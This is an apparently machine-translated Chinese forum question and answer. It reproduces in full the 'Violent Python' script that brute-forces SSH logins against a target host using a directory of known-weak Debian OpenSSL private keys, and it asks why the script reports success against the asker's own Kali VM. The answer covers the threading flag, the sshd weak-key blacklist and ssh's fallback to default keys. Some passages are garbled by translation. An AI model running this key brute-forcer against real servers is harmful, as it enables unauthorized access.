所以我在读这本很棒的书,“暴力Python”。在第2章中,有一个Python脚本,它使用私钥向Debian机器或任何运行SSH服务器的机器进行身份验证,该服务器上有用户,但没有强私钥。以下是脚本:
#! /usr/bin/env python
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + \
'@' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, \
ssh_newkey, conn_closed, '$', '#',])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. ' + str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog -H ' + \
'<target host> -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='specify target host')
parser.add_option('-d', dest='passDir', type='string', \
help='specify directory with keys')
parser.add_option('-u', dest='user', type='string', \
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user = options.user
if host == None or passDir == None or user == None:
print parser.usage
exit(0)
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: '+ \
'Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect, \
args=(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
main()
我发现了一个奇怪的基于我的内部脚本的拷贝,我发现了一个很脆弱的内部脚本。我不知道为什么它会在操作系统上找到多个易受攻击的密钥。当我运行这个脚本时,我指定1)一个主机,2)一个用户名,3)一个目录,里面装满了HD Moore生成的私钥。我不得不使用wayback机器来获得他为2048强度的非对称算法生成的RSA私钥。在
输出示例:
^{pr2}$不管怎么说,为什么脚本说它在我的Debian Kali虚拟机(VM)上为我的用户名找到了许多私钥?我试图使用ssh -irsa/2048/0002d5af29276c95a49dc2ab3b506707-23747 root@192.168.1.11 -o PasswordAuthentication=no
命令使用明显易受攻击的私钥登录,但没有成功。为什么不起作用?Python脚本实际上不是在做它所说的事情吗?有人用X光眼镜吗?让我继续。。。在
然后我检查了我的debiankali虚拟机上的/var/log/auth.log
,它有一些有趣而神秘的条目。日志上写着,Public key <Hexadecimal colon separated key> from <IP> blacklisted (see ssh-vulnkey(1))
我阅读了DebianKali操作系统上ssh-vulnkey
的手册页,发现这个程序可以在计算机上找到易受攻击的密钥。我试着用-v verbose
选项运行这个程序,发现一些密钥显然很容易受到攻击,尽管我不明白f键是怎么回事。在
对于1)为什么脚本返回成功找到密钥的结果和2)黑名单中的auth.log
消息意味着什么,有人有一个简单易懂的解释吗?另外,3)如果它发现一个易受攻击的密钥,为什么我不能使用该密钥登录到我的计算机?在
另外,是否应该将其移动到information-security
?在
邪恶的Python脚本:
奥康纳,TJ(2012-12-28)。暴力Python:黑客,法医分析师,渗透测试人员和安全工程师的食谱。爱思唯尔科学。Kindle版。在
据我所知,脚本只是遍历目录并尝试将它们用作连接到给定SSH服务器的密钥。这是在线程中完成的,因此输出的顺序不是确定的。因为在启动新线程之前,我们会检查全局
Stop
标志是否为True
,因此可能会发生并非所有文件都被检查的情况,因为之前的一个线程已经成功完成并设置了该标志。这就是为什么它报告说它找到了一个密钥。在您的SSH守护程序黑名单弱密钥是由OpenSSL的损坏版本生成的。这是件好事,你可以读到它here。这也是为什么你不能登录。在
ssh
自动返回到在配置目录中查找有效密钥。所以连接确实成功了,但是您的命令行参数被忽略了。尝试使用-vvv
运行命令并观察输出:相关问题 更多 >
编程相关推荐